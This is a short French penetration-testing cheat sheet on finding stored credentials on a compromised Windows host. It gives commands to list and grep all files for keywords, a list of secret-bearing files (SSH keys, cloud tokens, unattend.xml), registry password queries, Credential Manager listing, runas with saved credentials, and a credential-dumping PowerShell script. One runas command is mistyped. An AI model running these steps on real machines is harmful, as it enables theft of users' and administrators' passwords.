Bebzounette
Rechercher

Informations d'identifications
Rechercher des informations d'identifications stockĂ©es en dur sur le disque est une des mĂ©thodes les plus faciles qui quelques fois peut se rĂ©vĂ©ler utile lorsque l’utilisateur n’utilise pas de gestionnaire de mot de passe.
  • Au minimum ce type de rĂ©cupĂ©ration d’information sensible peut au minimum vous apporter le mot de passe de l'utilisateur actuel.
  • Au mieux vous pouvez rĂ©cupĂ©rer le mot de passe de l’administrateur local de la machine.
  • Lister le nom de tous les fichiers stockĂ© sur chaque disque prĂ©sent sur la machine
#lister les disques de la machine
net use
​
dir /b /a /s c:\\ > Dump_dirs.txt
  • Parser les fichiers contenants des mots-clĂ©s comme “passwd” par exemple
type Dump_dirs.txt | findstr /i passwd
  • Fichiers intĂ©ressants :
type Dump_dirs.txt | findstr /i ssh
type Dump_dirs.txt | findstr /i kdbx
type Dump_dirs.txt | findstr /i vnc
# Autres types de fichier Ă  chercher:
install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\\credentials
.azure\\accessTokens.json
.azure\\azureProfile.json
gcloud\\credentials.db
gcloud\\legacy_credentials
gcloud\\access_tokens.db
  • Les clefs de registre
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
  • Checker le Windows Credentials Manager
cmdkey /list
  • Checker si les utilisateurs appartiennent au groupe administrateurs
    net user "<USERNAME>"
    • Si oui lancer une commande runas avec l’option /savecred qui ira chercher les informations d'identification dans le Windows Credentials Manager.
    runas /sacre /user:admin cmd.exe
  • Utilisation de CMS.ps1 (script Microsoft qui permet Ă  quiconque de rĂ©cupĂ©rer les mots de passe stockĂ©s dans le Windows Credentials Manager)
    powershell Import-Module cms.ps1 ; Enum-Creds

Références :

Credential Dumping: Windows Credential Manager - Hacking Articles
Hacking Articles
Managing Saved Passwords Using Windows Credential Manager | Windows OS Hub
Windows OS Hub
SEKTOR7 Institute
SEKTOR7 Institute
Copier le lien